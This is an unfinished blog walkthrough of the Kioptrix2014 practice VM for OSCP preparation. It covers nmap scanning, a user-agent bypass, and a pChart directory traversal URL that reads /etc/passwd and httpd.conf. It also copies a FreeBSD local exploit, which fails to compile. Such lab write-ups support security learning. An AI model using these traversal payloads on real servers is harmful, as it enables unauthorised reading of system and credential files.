Kioptrix2014 – Finally

Kioptrix2014 is one of the most recommended machines to play around prior to  OSCP preparation. Therefore, I am very much eager to shell the box 🙂

Setup:

mountroot> ufs:/dev/ada0p2

*****

Kali Machine IP: 192.168.56.102

Step 0:

ifconfig

Kioptrix Machine IP: 192.168.56.101   (how? )

Step 1:

nmap -sn 192.168.56.102/24

-sn  SYN pack

Step 2:

nmap -sC -sV -p- -A -T4 192.168.56.101 -oN nmap.log

Ouput:

PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden

Step 3:

As always, let’s check whether we can find anything with robots.txt and source code.

No luck with robots.txt

Source code meta tag reveals something interesting!

Let’s visit the link:  http://192.168.56.101/pChart2.1.3/examples/index.php

Step 4:

I went through the folders and was looking for some upload function (I was expecting to upload some shell through which I could do a reverse connection but no luck lol)

Therefore, I had to do some shopping from exploit-db

searchsploit pChart

 cat /usr/share/exploitdb/exploits/php/webapps/31173.txt | less

We received ample of information but I am interested more with this highlighted one 🙂

Step 05:

you have to paste this line after the index.php

?Action=View&Script=%2f..%2f..%2fetc/passwd

By the way, %2f means /     you can learn more about it here.

Therefore, the complete link is

http://192.168.56.101/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd

Step 06:

Lot of things going in my mind regarding what to do next, I realized the importance of having a steady methodology or approach.

Anyway, at this point I really can’t think of a way to proceed further, so let us check the nmap result again and we see that there is a port 8080 is open. Let’s check what resources is loaded there.

It appears that server is hiding something from us. We can check the Apache Configuration. We can do that.

Visit this link:   Additional Resource: To know the location of apache conf file; here.

http://192.168.56.101/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

You can see that it is restricted based on user-agent. let’s configure our browser.

Step 07:

User-Agent ^Mozilla/4.0 Mozilla4_browser

Usually, I use burpsuite for the purpose but this time, let’s use an add-on to suffice the need. I am using Firefox and we will use this user-agent switcher.

  • Click on your add-on
  • Then click on firefox icon
  • click on Pen(or edit icon)
  • Paste the string Mozilla/4.0 Mozilla4_browser

Then I visit the URL again and I got an interesting application running on it.

This application has no upload burden as well. So, we are left with no option other than shopping in exploit-db

searchsploit freebsd 9.0




cp /usr/share/exploitdb/exploits/freebsd/local/28718.c . 

I copied the exploit code to my current directory (which represents by . )

Step 07:

There was an error when I try to compile the exploit code. I did google and thought it might be an old issue.  No, it wasn’t 🙁

To compile the c program:

gcc -o exploit 28718.c

Error Code:

28718.c:25:10: fatal error: machine/cpufunc.h: No such file or directory
#include <machine/cpufunc.h>
^~~~~~~~~~~~~~~~~~~
compilation terminated.

Nevertheless, we still have one more exploit we have, remember the step 06?

Step 08:

To be continued

 

 

 

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *